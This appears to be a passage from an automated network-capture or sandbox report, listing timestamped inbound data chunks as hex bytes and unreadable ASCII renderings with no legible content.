2022-11-07 22:49:09 UTC	8057	IN	Data Raw: 1a d5 a5 f7 9f 19 bc 04 f4 0b 4e 46 a7 df 73 84 29 57 16 55 a7 91 6f be e7 8b 75 ba 56 3f 5c f4 f7 93 54 4a c7 38 fe fd 92 54 35 e1 9e 3f 7e 1e 68 1d 2e 30 dc fb eb 7b fe e2 da 42 9e 73 34 ed 6f c7 44 ad f3 50 4b 36 58 76 c5 29 10 fb d0 2d b0 a1 b3 fc e0 77 b3 ee 5d 71 5b 92 d4 0b f4 d3 d6 08 99 b5 ea 55 31 d7 94 f9 92 9c 5f ef 9e d8 24 4e 2b 37 0a a8 47 77 79 1c 03 57 1e 49 64 f0 62 b5 a3 26 57 2e 49 d6 0a 2b 62 91 80 b9 74 40 bc 9c f3 e5 79 b8 bc e2 8a 56 bb 8f ac 97 a9 95 08 f9 24 0d d4 a9 93 f7 79 70 5a d1 4a 61 6a 43 57 d4 d3 37 c4 bd 5b dd 93 a1 e3 89 04 bb 22 78 63 75 61 47 88 5b 5f 62 5f 07 37 2e c2 3d 9c 7e d1 3a d5 a1 a7 d2 9d f0 a1 59 ac ca 3b c1 81 9a f7 71 bb 5b e5 b6 27 c2 7d f3 93 2b e7 e6 26 68 67 e2 ae d8 73 8a cd ee 27 0a 8d 59 cf b3 f7 Data Ascii: NFs)WUouV?\TJ8T5?~h.0{Bs4oDPK6Xv)-w]q[U1_$N+7GwyWIdb&W.I+bt@yV$ypZJajCW7["xcuaG[_b_7.=~:Y;q['}+&hgs'Y
2022-11-07 22:49:09 UTC	8073	IN	Data Raw: 45 00 00 3a a7 22 91 83 2d d0 b6 d5 98 1d e8 f1 d5 d9 f4 04 0a 91 f0 44 22 3f 15 09 a9 5d 28 bb b7 2e 1c 55 54 ae 70 bf 29 02 cf 2d 14 da 6f ca 7e b9 99 9d f7 8f 58 9a ed a6 2d d6 f2 9a 1e 9a 3f 74 9c 0b 61 3c 12 13 39 f3 ac 25 85 c5 e7 cb c9 a9 95 33 74 15 6b 8b 96 f6 66 17 e1 66 aa f3 82 b8 39 a0 da c7 f9 1b b6 bd 72 ea 28 6c f5 52 dc e2 93 59 c9 73 1f af 24 fa 50 8a 48 aa 7b d7 86 84 ba e5 21 0f 6c 9f df 80 9f c6 42 ee 59 d5 9c 4e a9 9b 97 5d b1 20 bc ce b3 97 92 2b 3f ff c7 08 59 eb b6 db 09 b4 15 0b d1 12 dd 8c 8f 4b 4e d1 b9 76 c4 c0 8e 4a 37 ab db 0f 1c 72 e8 98 f2 c9 cb ef 87 5a 6f 03 52 21 7f a3 d1 09 3f 06 93 48 c0 8b 8e d3 24 a9 da ee 47 24 ad 15 12 91 1d bf 93 47 05 c5 3b 59 c9 47 dd 4c 75 70 a8 40 6b 34 8d cf 2d a8 69 33 b3 3d a7 73 8e bc d3 Data Ascii: E:"-D"?](.UTp)-o~X-?ta<9%3tkff9r(lRYs$PH{!lBYN] +?YKNvJ7rZoR!?H$G$G;YGLup@k4-i3=s
2022-11-07 22:49:09 UTC	8089	IN	Data Raw: dc 67 98 0b 84 3e 67 b8 75 16 7d cc f0 2a 80 d5 ef f1 5b 83 05 d2 9f 7a 37 7f 83 fe 35 5b 2e 96 e0 db 7c ca af 67 a5 49 f1 13 b6 d4 87 e9 f9 d7 77 87 33 4d e8 36 85 e9 1e be fb f2 76 1f 1f 7f b9 7c ac 29 ed d9 c1 05 54 e8 de 0b 15 35 2d 9f f3 90 e2 04 b7 e1 f6 a6 7c 97 fd cd 6f 29 99 11 5f 5f 42 28 6c 7f 7c c1 b8 0e 3d 6e 45 32 e5 ba 98 b6 4d b3 2a 25 01 39 ef f1 3c 73 89 5b 7c e5 ec 9e 4b 34 6d fc ea af f0 6f 7e 28 37 71 a7 52 e8 b1 40 93 bc 88 cb 18 bd 79 7e 7d 8a 83 1b ba cc 0e 79 50 a6 d1 e2 b9 31 4a 20 6b 56 f9 e4 47 35 2b 55 f6 97 99 37 bc 36 42 43 ec 39 35 f7 79 26 9d 04 26 8c 96 79 ce b8 b6 97 97 ee c5 3e ba 49 bf e8 13 d6 30 44 93 53 1d fd b2 a0 2c 5e 15 d4 58 9d 1c 87 0a 39 56 a5 64 69 2e 7d e3 39 1d d3 ba 79 4a e2 db ce 90 19 e2 0c ec 84 6f bc Data Ascii: g>gu}[z75[.\|gIw3M6v\|)T5-\|o)__B(l\|=nE2M%9<s[\|K4mo~(7qR@y~}yP1J kVG5+U76BC95y&&y>I0DS,^X9Vdi.}9yJo
2022-11-07 22:49:09 UTC	8105	IN	Data Raw: dd ff 1b 5a 91 f9 1e e3 49 43 48 b7 fa 4e e0 1e 27 fe 7b 6a 56 d6 40 6e 81 6f c0 28 65 b6 e8 c4 9c 7a be 16 fe c2 00 68 d6 91 1d 70 22 8d 31 93 6c 29 80 d1 e4 bf 27 66 70 44 7e 52 2a 40 c2 a7 87 39 61 d6 34 25 3b e1 93 a5 23 40 9f e3 44 ef 9e 67 d6 e8 bc 21 70 49 7f f3 0c 0c ca ed f3 fe 90 2f 2c f1 4c 30 1c 88 aa 7b 70 ee a7 ef 12 58 5b 1a 6c fb 61 32 59 9b 26 80 0b c9 e8 e9 c4 c2 05 22 21 fd 09 a1 e2 fd 9a b5 04 25 10 29 89 b2 13 8e bb 66 84 7b b1 85 10 e1 d4 09 1b 76 0e e7 65 17 09 ce d0 7f d9 b6 8e 0d 3c 0d 7e 3a 6c 3c 35 2a 22 a5 1c 0c f3 12 c1 b4 99 2c 18 c2 aa dc 91 44 7c ce d3 f0 0d dc 95 1e 91 49 c4 85 39 be 85 02 8e 2a cb e7 fd 9a 44 77 65 d9 df 47 f2 27 08 e4 ca df 23 a3 18 00 00 a9 a4 5d 09 fa 83 88 d5 08 38 54 fb c8 96 62 f2 0a 81 d6 58 f7 0a Data Ascii: ZICHN'{jV@no(ezhp"1l)'fpD~R@9a4%;#@Dg!pI/,L0{pX[la2Y&"!%)f{ve<~:l<5",D\|I9*DweG'#]8TbX
2022-11-07 22:49:09 UTC	8121	IN	Data Raw: db b6 a5 10 dd 93 ae e2 f0 23 95 fc 54 f2 8e 34 b5 b2 d4 66 5d 3d cb a4 21 2f 6e 21 64 fb 70 45 51 52 9a 7c d8 46 35 2a 68 f4 64 42 96 9f bd 13 d2 83 6a ca fd 36 8b 3a 24 be 1a 1a 1d 4a c2 bf ce e7 3d b1 5f c7 8a 69 ac c4 ac 46 e1 71 ff 28 49 9b ba 28 b2 58 be ec 59 f6 62 3a 12 53 30 2c 37 64 89 56 58 54 0e 6f bd b9 4e e5 5f f3 5e a9 c2 50 df 59 7f 31 c5 51 24 71 8e 31 78 8b c4 c5 97 fa b7 5a 52 e6 bd 82 0e 88 7a 46 c1 29 ef 07 a5 12 fb 6e 15 c4 16 42 5f 08 f9 a7 e3 ee eb 7d df af 5c 26 9f e0 5b f0 72 99 b2 a5 ad ec 98 52 42 f8 93 ff bb f1 37 4b 95 ac 52 3d 20 74 e5 f3 58 8a d6 3f 47 8e 5f b2 3a 78 8d e5 7b 15 1e d3 a1 72 ff f8 7b 75 de af 7c 23 75 d1 34 4b f3 36 0a 3a 1c 38 dd 38 64 3e 5c 20 26 cf b6 78 f5 fb 50 88 21 79 f0 db 86 76 c8 9f bc 76 34 bd c5 Data Ascii: #T4f]=!/n!dpEQR\|F5*hdBj6:$J=_iFq(I(XYb:S0,7dVXToN_^PY1Q$q1xZRzF)nB_}\&[rRB7KR= tX?G_:x{r{u\|#u4K6:88d>\ &xP!yvv4
2022-11-07 22:49:09 UTC	8137	IN	Data Raw: 8b b9 46 57 94 b4 70 44 b8 c4 3f 00 2b 08 a8 4a 16 85 7f 27 13 b0 b9 86 d4 55 9c a2 9c 0b ba c6 7b a7 65 61 22 6f 0d 01 b6 db 91 8a 3a 7f fe d1 f7 70 1c 46 1e fd 15 dc 24 47 63 4b de 9e 2d 3f 45 df 74 bc eb 58 8f f8 55 7f 0b 36 81 67 53 3e aa 6f d0 7f b1 22 db 6a e2 a2 0c 87 aa 0c fb 15 da 68 df c4 21 ac ba 2c 86 44 3c a3 54 df 54 0f a7 4d 12 37 87 e1 27 fe 08 12 1c b6 95 3e 98 7a c6 44 d6 88 c1 c7 50 75 68 03 f4 e2 43 a8 0c 1a 99 4e 96 81 b3 fe 8c 70 f8 d2 93 8a 5e 22 82 68 8c 62 e3 27 10 b6 f2 4d 1b 68 55 45 cc 58 92 35 5d bd f4 d2 3f 7f 8a 0f 38 65 e0 cd 5c 30 f5 23 c0 c5 d0 7d c2 1c 10 fc 37 dc 3e 09 ad 40 f2 01 08 5f 92 a6 74 76 4c 3e a1 37 70 91 df bb 84 71 d3 20 01 e6 3b df 5a 3d 76 84 f7 28 cf a6 88 bc 4b 2c f9 fb 98 33 96 81 11 76 8a 5e d9 b8 40 Data Ascii: FWpD?+J'U{ea"o:pF$GcK-?EtXU6gS>o"jh!,D<TTM7'>zDPuhCNp^"hb'MhUEX5]?8e\0#}7>@_tvL>7pq ;Z=v(K,3v^@
2022-11-07 22:49:09 UTC	8153	IN	Data Raw: ab 26 12 6a 11 03 f7 0f c2 ae 5e 5e 1c aa ca 32 ef ec 97 8c ee fa bd 24 7c b2 59 72 68 ea be 63 44 53 c7 39 42 4e 75 7e e3 45 57 33 8b 9f 30 85 0e 63 91 15 a0 9a 40 3d 53 3c 38 7b 1e 78 89 22 a3 2f 96 1a 5b cc c9 08 a6 21 5c f2 78 bf 9f f8 b4 c8 24 d2 58 5d 8f e4 25 6f cb 24 0f d5 f6 e9 e7 9f cb c2 3e 26 0f d7 a7 12 33 92 ff 16 0b bd a9 1f 7a ed 5b 3b be 6f e3 21 7c 11 be 78 c0 79 23 91 b8 4b 8f af 90 fe ac c6 38 65 8f 8d 39 2d 7d d3 95 25 26 4b f6 af cb 93 35 ee 4f 99 39 fc fc f9 77 2b 92 94 0c f5 ec 06 19 ea b9 4a 87 ca 6e e3 2a 70 70 91 b8 ac 8b 06 9d 87 f8 96 af 14 09 29 64 d7 83 78 4a 70 0f 73 f0 57 d2 e5 e1 4a 1c b2 5e 3f 17 58 65 d7 ee 5a fe 21 6e 0b 8e 5f 64 e5 92 f2 6e 1d b2 b2 74 b3 85 84 ef 34 a4 0c 5d 3e 48 17 16 6c dd 15 3a 1c 59 4d 1c 70 87 Data Ascii: &j^^2$\|YrhcDS9BNu~EW30c@=S<8{x"/[!\x$X]%o$>&3z[;o!\|xy#K8e9-}%&K5O9w+Jn*pp)dxJpsWJ^?XeZ!n_dnt4]>Hl:YMp
2022-11-07 22:49:09 UTC	8169	IN	Data Raw: e8 71 9b 30 7d 95 80 b8 0f d6 5d d1 ba 8c 72 f1 fa 1c 94 9d 8a 72 35 0d 81 fe 29 80 18 79 7c 2a 1e fb 96 ac be 91 eb 21 57 69 d7 76 6c fd e9 15 f9 34 0e 6f c3 c5 2d 47 e8 e3 f5 e1 1b 37 48 9f 95 da 27 f4 e6 df c4 00 e3 cb f7 ae c3 d2 5f 48 6c d0 f4 ca eb ea 3f 02 14 f6 22 90 07 8b 56 74 92 5f 50 8a 67 e3 3e bf d2 93 52 56 ba ec 13 be d9 5e 7d 64 0b 3c 60 8f e2 86 0b ae 3d 78 3f e8 85 ec b6 5a 08 0b 74 53 2e 31 76 67 fd ec ba 02 32 70 1b 9b 53 0f 25 c4 34 7a 12 9b e7 3f 29 5d 20 98 cc ce 15 fd f1 6d b9 49 f6 50 fe 90 5f d4 f6 10 05 01 ef ef be 17 68 b8 4f 13 3e 6d 74 82 b5 70 6f bd 96 3d 1f d2 37 c7 bc 73 7f ff 5b cb 26 94 24 24 f3 a3 62 f8 2b 97 25 72 f9 1a 93 00 6e a2 b5 f2 a5 92 03 77 e2 c3 76 51 8b 30 43 c7 7a 62 5d 86 88 3f c1 e5 67 08 af e4 93 26 a1 Data Ascii: q0}]rr5)y\|*!Wivl4o-G7H'_Hl?"Vt_Pg>RV^}d<`=x?ZtS.1vg2pS%4z?)] mIP_hO>mtpo=7s[&$$b+%rnwvQ0Czb]?g&
2022-11-07 22:49:09 UTC	8185	IN	Data Raw: c7 98 9c cb 6c bc 8d 90 72 b6 f6 87 3f dc 11 7b 16 bb a2 17 a5 2b fc 56 34 5d b8 c3 af 02 dc 7b bf 05 ce ae 54 7d 49 d0 be 22 32 0c 98 f8 4c 74 be 71 58 15 57 66 12 11 c3 ae e4 4b db 2e d8 39 a8 25 78 e5 3b 88 24 de 17 69 24 22 7b dc bc 1c 26 7b b7 9c ed 9b d8 51 c7 4e 2c a9 de b3 82 5f e2 8e 1b 0a 64 ee 9f 02 7c 6e 6e e4 76 50 ab e7 9d 67 9c eb 01 6f c9 7f f0 47 58 7e a9 b7 6d d6 0e b2 36 9f 23 e9 53 1a be ef 25 fb ae 27 f7 57 d2 c4 f6 ca 59 c5 88 11 6d 8d 7a e1 0f e8 15 69 71 7b e0 97 2f 31 b2 cb a4 cc 1a fd c4 18 0f cf db f7 46 7b aa cc 4d 17 db 2c 9d 9a f8 3e 86 cf 26 48 3c 1f cb a9 a7 5a cd 56 1b 72 9c 8b b1 cb 39 f9 4c 58 9e d4 df c7 dc de 7f 14 6e fd e9 fd 20 5d e3 c3 c7 56 82 ed 88 09 fa bd 18 9b 1e 31 9d f7 12 46 df 9f df d9 35 b6 0f 17 fb 55 c8 Data Ascii: lr?{+V4]{T}I"2LtqXWfK.9%x;$i$"{&{QN,_d\|nnvPgoGX~m6#S%'WYmziq{/1F{M,>&H<ZVr9LXn ]V1F5U
2022-11-07 22:49:09 UTC	8201	IN	Data Raw: c9 e5 29 94 78 a9 b9 6c 56 c6 93 b7 ab 6c 52 8a 6c a2 0d 38 c5 09 e2 2e 93 94 cd 0c f7 e1 28 9e 9a b2 92 1c 4e 7e 38 6e 6b c0 45 46 3e 9b f3 22 63 38 e1 a5 6b f4 37 12 c5 ca e9 a1 ac 19 6a c3 72 79 3b 28 f2 96 ed 72 a8 0d f3 90 d0 de 8d a7 0f f2 42 ef 59 8a f1 1e 4b 29 f5 ad 3a 84 09 5c d3 a2 cc fd 53 bc d6 ac d6 fa 9a 4c c8 5e 9e 7f e3 dd a7 6b 65 a6 18 07 aa d6 05 9b 6b 84 91 b8 7d fa b2 57 b1 0d 59 ce a1 ad 30 9d 17 0e ba 4a 2f ee 23 24 2c ee 32 10 a6 8d c4 15 45 3a b9 c2 c4 35 ef 7c 75 f2 08 13 de bc 4b b4 f8 22 2c 4f cd ea 45 a8 11 be 1d ff 69 3a a9 07 03 0d d8 c9 dc 37 0f 57 ee 62 63 19 14 ac f8 5a 54 f7 82 b0 4f e8 5f 7e ba a8 d6 99 d9 60 0d 79 34 9f f1 2a e1 ab a7 4f 90 4a d7 56 32 ad 74 05 2f 67 ec f2 62 ce b4 fb b8 da 98 d7 b9 0c fd 83 65 df b9 Data Ascii: )xlVlRl8.(N~8nkEF>"c8k7jry;(rBYK):\SL^kek}WY0J/#$,2E:5\|uK",OEi:7WbcZTO_~`y4*OJV2t/gbe
2022-11-07 22:49:09 UTC	8217	IN	Data Raw: 1a 5e 76 e9 44 98 9b 65 fe 11 0b 61 56 a6 3c 03 f9 62 d3 8a 70 3a 7b 28 ee d8 0c dc b3 f0 3f ef a0 ee 08 ba 0a f9 3b aa d6 87 29 6a da 53 b3 98 b7 ef 6b 9e f4 fe 10 27 b1 da 97 a7 73 fa 5e f1 e2 49 7e e9 08 f0 f4 97 9c e0 13 61 df 71 f9 81 29 72 5c bb 3a 0b c3 de e5 16 96 0e 3d b3 1e cd 1c 65 20 97 5c 60 24 38 a0 9c ce 0c 18 78 93 c8 ca 5f 70 89 2f 54 7d c7 1c 51 6b 6d c9 bd 0c d6 ff f6 03 18 39 29 db 7f fa d5 92 f6 6f cc 2c 84 4b f0 82 f9 b1 98 61 cc d9 a1 88 a9 5d fc c6 fd b2 25 39 71 b7 21 49 7c ee 34 f9 e5 e9 33 95 09 d5 10 38 1a b8 7f 37 9c 36 2f b2 53 2a ac af 23 97 a5 35 f7 10 f9 7b f1 fc 6d d0 68 b9 7e db 43 b1 97 9c d7 6e 25 bd 18 d8 77 aa b7 9f 96 5d be a8 a7 aa b7 10 db cb f2 6a bc 1b f4 a2 2a 08 c1 92 68 f6 e4 43 44 82 d8 c7 ba 09 5a a8 fe 88 Data Ascii: ^vDeaV<bp:{(?;)jSk's^I~aq)r\:=e \`$8x_p/T}Qkm9)o,Ka]%9q!I\|43876/S#5{mh~Cn%w]jhCDZ
2022-11-07 22:49:09 UTC	8233	IN	Data Raw: 4c 8a 67 e0 b1 d6 bc a5 a3 e1 d8 35 62 36 6c 78 b2 14 a0 0b 33 95 75 36 4d 64 70 3d b1 fb f7 ba f7 7a 74 aa f9 a2 29 f0 1d ea ca 42 cf 93 4e b0 03 0e 93 2d 3a ae 16 cd e1 83 d0 07 4b e4 f6 c4 7f 50 da 57 13 66 7a b4 e2 49 dc da b5 f6 0d 31 a7 13 2c 83 e6 2c 99 58 0e b4 22 b4 e3 8b 95 46 05 b2 13 dd 7f 14 0a aa 25 aa 3b d3 ae de a9 9c 2d 73 00 51 56 b3 ee 1b 61 f4 84 03 68 cb 30 d5 a9 76 8c df b9 0d 0e a2 d5 95 f0 94 ee ba f4 52 fb 9b 73 33 a4 f3 10 d4 13 8c 8d e4 0c 50 52 52 75 ea 4d 88 b0 b9 ef 2b 36 9b fd 56 05 db 5f 73 f7 29 5b ae 91 7f ff f4 26 27 e0 22 1d c4 7b fb 75 60 52 ea a9 23 e2 44 4a d1 af de 19 bd fc 38 96 93 39 3e 0e 6b b4 20 5a af 78 0e 3f a9 8f 70 f7 9a 26 79 76 99 31 ef 4b a0 43 73 a6 5c 8a fe c8 63 aa fe a4 64 29 da a8 63 97 a3 b4 98 c8 Data Ascii: Lg5b6lx3u6Mdp=zt)BN-:KPWfzI1,,X"F%;-sQVah0vRs3PRRuM+6V_s)[&'"{u`R#DJ89>k Zx?p&yv1KCs\cd)c
2022-11-07 22:49:09 UTC	8249	IN	Data Raw: 4f 2d 00 46 ae ec fd 7b bc 67 6f b5 23 5f 94 75 79 e8 ed 9b d8 65 4c d4 54 2f 96 f5 11 46 18 6f df 1d ca a4 6e 77 64 24 03 08 ca fe e7 61 fa cf a3 2e aa 6c 3f 34 c0 fe e2 ca f7 f7 7f 73 3f 28 85 13 5a 74 c8 93 aa 08 a1 80 12 68 60 c7 7f 50 d9 a6 3f 0d 62 8c b0 84 c9 71 bf a6 4b 9b 9a 0e 3f b1 0d 96 0c 9a 30 ee 4a e3 90 e5 79 80 3b 2f b5 01 a8 40 e6 11 e7 52 62 04 86 c0 7b 76 af 9c 97 6e bb 4c 24 a5 9a fb 86 cb 8c 5d e6 21 06 d9 5f 8b 9f a9 33 c7 44 76 97 1d 1a a6 95 26 ba f3 96 f5 b7 b5 ff 58 8d ca 08 24 4c 11 a3 2f e8 9e 14 b3 e0 40 67 52 26 2e 69 c0 d6 3d 15 db 92 59 af c8 f8 3d f7 e4 77 a4 8b 1b 7b 67 8a 1d fb b5 de cd e3 5d b9 c0 32 91 28 1a b6 4e b3 ef 91 2f 5b fb 15 f2 29 fb 3c 0a 98 be a6 52 8a f0 de 32 ca 5a 84 40 98 1e 3a 19 f6 48 44 42 54 0b c5 Data Ascii: O-F{go#_uyeLT/Fonwd$a.l?4s?(Zth`P?bqK?0Jy;/@Rb{vnL$]!_3Dv&X$L/@gR&.i=Y=w{g]2(N/[)<R2Z@:HDBT
2022-11-07 22:49:09 UTC	8265	IN	Data Raw: a2 47 85 f2 b6 90 90 cf 1a 38 6e dc 15 36 7a 3e 92 5d 55 51 a1 e8 d9 52 6c 04 88 de 13 b2 29 6a cc 02 b7 01 a9 18 07 62 6d 65 0c dd 5c 13 e9 c9 a3 83 bb af a5 9b 73 3e d7 89 e6 a6 f0 7d 19 ff 66 5a 89 70 e5 86 31 be b2 ac a6 78 36 f0 33 22 59 d7 ce ee 6a f2 f7 ad d3 a2 c2 62 58 f7 23 34 b4 81 e1 b9 de f0 98 99 c9 cf 01 b0 ba 89 bd bf a1 72 06 31 2d e8 7a 63 ce 96 e2 44 48 de 32 70 f4 8f 18 73 39 84 12 6b 14 eb e1 59 bb 91 7a bd 2e 3d 59 45 e0 2a e8 cf 82 d7 93 9c f1 3d 67 51 51 e7 44 f7 8f 84 e3 e5 17 81 37 2e ed d7 4b e3 9c 3f 46 e4 5c e0 d1 a2 e4 3e f7 15 68 97 ba f5 a9 bf 20 a9 49 d9 b5 ce cf 12 07 73 0f a9 cb 9f d3 04 2f 53 c5 af d0 36 bb bc 4a 7a 93 46 cb 6a 8f f5 63 94 e2 df 3c 6f 98 7f f6 e6 f7 c4 f9 c5 6d b1 77 b7 a9 cb 18 29 c3 0d 93 09 ce 35 17 Data Ascii: G8n6z>]UQRl)jbme\s>}fZp1x63"YjbX#4r1-zcDH2ps9kYz.=YE*=gQQD7.K?F\>h Is/S6JzFjc<omw)5
2022-11-07 22:49:09 UTC	8281	IN	Data Raw: d5 d5 64 44 16 e5 a7 a4 f5 e2 a7 c7 27 14 f0 7e f1 4e d0 79 c5 97 15 7b 9b 05 a6 8b fc 82 1f 38 a3 be ab f3 49 48 5f 74 ea 1b 5e 63 16 c7 b9 fe ee aa 8d a4 ac 88 1c d8 05 fb 94 67 24 28 7b c4 bf cf 66 c6 62 44 3e 4b b8 df c2 f1 36 3d 04 a6 95 a3 74 3f d8 50 78 08 76 82 60 0d cb 15 36 83 1a 8b ff b6 d5 78 d1 bf 00 62 7a cf fd 6e 98 1e 0e b7 e4 46 7b d0 66 f8 28 fe 13 0f 92 41 b5 d3 48 fd fd 57 c7 d7 a2 70 8b 81 ca 82 86 ed e2 74 42 e4 5b c4 65 09 f2 b4 52 98 33 83 42 03 06 a8 c9 95 d8 d7 11 2a a6 c7 f5 09 e1 01 34 f8 f8 ef 7a 30 d5 1b 25 5e 0a 28 04 26 7c 2a b5 9a c3 e3 aa bb d1 e8 d2 f9 8e 5b e2 98 76 7a 50 e2 cf 05 cd d5 91 59 92 5a 72 c9 a0 02 dc 46 22 7f 21 8b a5 eb 91 c1 80 53 46 01 53 d6 33 5b a3 2f 0e 65 a6 79 ee a9 a1 1f 9f b5 1b 3e 0c 88 bb ff f9 Data Ascii: dD'~Ny{8IH_t^cg$({fbD>K6=t?Pxv`6xbznF{f(AHWptB[eR3B4z0%^(&\|[vzPYZrF"!SFS3[/ey>
2022-11-07 22:49:09 UTC	8297	IN	Data Raw: 7f 8d 81 4b 4e 4a 91 f0 2f 17 bf d0 9e 76 6a 14 e3 b9 fd 5d 20 fa 4d 1a 45 15 c9 4f ad 91 e7 c5 76 62 f2 e3 8c 0d d5 e5 f1 50 ee 39 7b 88 7b 92 cf b7 9f 14 d2 94 c3 0d 8c 79 dc f8 42 e4 77 bd aa 90 11 aa 82 1e f5 74 9e f7 eb b6 32 65 14 22 d0 fb e4 b2 53 f4 f9 ec c2 36 a1 58 ec 5c fe ca 5c ec ef d9 83 97 3f a9 5b 0e 0c 1b a5 b0 25 49 1d f5 6b 3d 09 c1 84 2b 74 9c 45 1d 0d b4 f8 f1 a4 28 ad c4 54 c3 ef b5 fe 58 98 3f 94 36 d0 98 9c a2 08 e7 8d b7 bb ff 2b 38 2f c5 d9 52 8a 36 c5 22 4a 5a 15 ca 72 ae 9d 27 74 d0 e1 9a 5f c6 0f 6f 1b 7e 6a 4e a1 61 2c a7 85 3f 38 40 6f fa 4d 93 f6 b1 76 e7 6f 4a e9 39 65 ea e1 0b 37 e2 a2 17 99 c0 9a 29 5d 2e fb 9b 0d 6a a1 4b 59 a7 2b 46 12 fa 6a 51 da 97 c4 61 e6 3b a0 f5 a0 a2 b8 ea 21 da 53 fc 60 d1 fe ad b5 9c a5 48 68 Data Ascii: KNJ/vj] MEOvbP9{{yBwt2e"S6X\\?[%Ik=+tE(TX?6+8/R6"JZr't_o~jNa,?8@oMvoJ9e7)].jKY+FjQa;!S`Hh
2022-11-07 22:49:09 UTC	8313	IN	Data Raw: cd e5 1d 0b ac fc 36 11 f4 b1 96 2b c4 08 c0 12 7a 0c fe 5b cb 01 5b 24 e6 0b 86 1c 0e 46 4c f5 c0 5e a0 f0 ed fa 30 c1 e6 5e 38 80 77 f2 59 42 d8 1e 88 d7 0e 93 b9 6e 3e 43 99 55 86 81 ed a0 b4 9c a0 65 f0 08 87 dd 25 6a a0 a6 11 f4 71 0d 21 57 f6 4a 9a 81 f7 9a e0 86 19 de 80 60 83 f3 2d e2 7c dc a7 79 2a 09 29 ef 66 88 51 35 5f 52 60 64 2f e6 c5 7b 10 d2 b4 c9 2a 94 1f c6 f1 1e 04 09 0b ee df 5e 8b 57 11 bd c8 39 c1 2b 54 20 88 33 64 45 45 fe 1c 07 bd a0 c3 20 68 aa 34 dc b9 26 0c 8f ea 0a 19 84 7b 10 9a 84 fe 09 c3 c5 e9 c9 84 ed 56 d6 80 ed 49 11 11 d8 9f c6 fd 2e 7a dd 91 18 fd 07 3e 97 38 51 57 a8 7e 1f 52 40 6a 79 09 dc ea b0 90 c7 b9 d3 c5 6d 3d c3 05 22 93 08 a4 d6 76 9d 22 98 db a2 06 fb c0 09 b2 27 71 a6 72 49 8b ed 3d 0f ca 38 f0 55 66 fb fd Data Ascii: 6+z[[$FL^0^8wYBn>CUe%jq!WJ`-\|y)fQ5_R`d/{^W9+T 3dEE h4&{VI.z>8QW~R@jym="v"'qrI=8Uf
2022-11-07 22:49:09 UTC	8329	IN	Data Raw: 31 ee af ce 67 3f 3b c3 fa b3 7c 61 f8 f1 1b 0f 3d 69 e7 ac 7c 07 75 ce b2 21 7d 20 fa 6f 17 39 41 07 ce 1d ca db 1d aa 1d e2 fc 31 1d ff 72 da 29 4d 98 03 fa 9f 93 f1 7a af 15 db 8b 12 35 2a e3 d7 b7 34 38 6d 22 f2 2a 04 42 56 47 23 9d c4 25 78 4a b5 2b 3f 23 36 25 f7 f5 58 0d 36 58 9d 2c d8 0d 99 a7 76 3d c8 0c 57 33 67 6e 13 ba d2 45 5e ea d2 de 4e 08 9d ea 5a a2 3f 13 6f c8 2b 49 f0 b5 44 8f 56 e9 13 0b c4 0e f9 c7 66 9e 0f 7b ff 42 0f a9 52 e9 88 19 d2 66 ec 98 85 07 1a a4 70 b7 09 c9 f4 b7 ca 25 66 4a c9 0f aa 14 e7 3e af 0d 32 a9 28 13 f5 d1 78 f3 d6 b3 0d 8d 5e 8d 28 f1 6d 92 8d 64 ce 67 0f c5 8f 2a b2 2e 0d e7 2a 43 ae 45 e8 89 36 d5 a4 b1 31 d1 94 b4 08 2c b6 d5 74 ab a7 e7 a2 c5 48 fe 5f 51 b2 c7 5c ed 22 e8 62 42 6f 0f e4 e3 77 6b d9 25 c8 ec Data Ascii: 1g?;\|a=i\|u!} o9A1r)Mz548m"BVG#%xJ+?#6%X6X,v=W3gnE^NZ?o+IDVf{BRfp%fJ>2(x^(mdg.CE61,tH_Q\"bBowk%
2022-11-07 22:49:09 UTC	8345	IN	Data Raw: 9e 71 af 48 e6 ea 85 95 0e 01 12 c9 11 28 f8 8c 86 aa 78 cf 73 ea de f1 39 06 e3 d3 74 60 5c df 99 71 d2 f8 71 70 af c8 cb 68 a7 61 7c e9 74 72 0e 58 50 5a 42 3e 3f 24 f7 23 49 4b 44 e6 42 3b a1 7f d7 8e 18 89 0a e7 8f 7a 1c 81 ae 23 b5 6e a2 50 31 47 6d ff 7f 4c bf 99 d0 f8 48 72 79 f8 f2 90 e3 44 34 4d 6b 98 f5 ee 8f a9 dd 1d e2 d6 24 7d 98 e3 e9 47 a8 d0 52 54 df f1 c6 0f 7e 81 8c 5f 75 da 64 eb 59 51 89 c8 c2 8f fd ae 5d 44 69 58 b1 f0 eb 69 ff 48 42 49 f5 22 a1 07 c6 2e aa 6e bb 54 fa d4 3c 97 0c 9f 94 f9 1f d3 35 59 33 f4 2f 0d f0 4e 18 21 b2 04 85 3b ac c1 9a 9a 8b b8 07 15 cf a6 43 a2 2b 5e f5 f1 d0 82 d2 fe 6e 43 49 1a 04 52 94 e6 36 44 4f 7d 2e 96 ca d4 12 be 73 f4 7b 90 c8 62 f3 d6 9a d9 96 cc 7c 20 68 2f 93 7f b1 61 5a 6c 59 49 a0 f4 87 76 fd Data Ascii: qH(xs9t`\qqpha\|trXPZB>?$#IKDB;z#nP1GmLHryD4Mk$}GRT~_udYQ]DiXiHBI".nT<5Y3/N!;C+^nCIR6DO}.s{b\| h/aZlYIv
2022-11-07 22:49:09 UTC	8361	IN	Data Raw: d2 29 d8 83 2e 0e 5e 54 53 85 bd 27 b9 6f c7 cd 78 07 7f 99 bf 8e 1f fd db e9 16 ef 4c dd a4 ba ac f5 9a ae a0 f1 95 f2 f7 03 5b 02 8e 71 ec b1 76 56 91 d4 ca 0d df 48 81 0a 40 b4 fe 68 42 4e 3a c8 20 0a 29 0b 51 9c 67 2a 25 27 17 c0 5b 8b 0d ef f1 cc 20 5b 28 2d ee 60 7a 74 1b 7d b4 0b 92 52 8f 91 bc fa 58 ae c0 f3 48 36 ad 64 58 9a 8a 65 ae 9b 1b 3d a2 83 28 a0 72 9d 73 cb 93 1b e4 ac 08 b5 f4 f6 77 f4 f2 cb d5 22 8c f4 6c 99 e9 1d e9 53 16 92 23 f8 67 98 d5 26 e9 46 81 b2 ac 58 a1 b0 ec f2 ae 63 b1 a0 07 f7 dd 31 4b 98 3b e7 dc 10 07 31 b3 98 ad 4a 26 1d c4 e3 f8 09 a6 ef 64 04 4b 72 f3 72 10 e6 4b 68 e1 ab 1d f2 3b fb 71 0f 17 49 ca 5f 70 bc e0 38 f2 e4 ac a5 eb fc fd f1 4e 23 1e 63 7f c8 64 f5 63 1f e6 ab fd 41 b9 5f 2c b3 e2 cd 35 6d 53 3f 59 3a 5a Data Ascii: 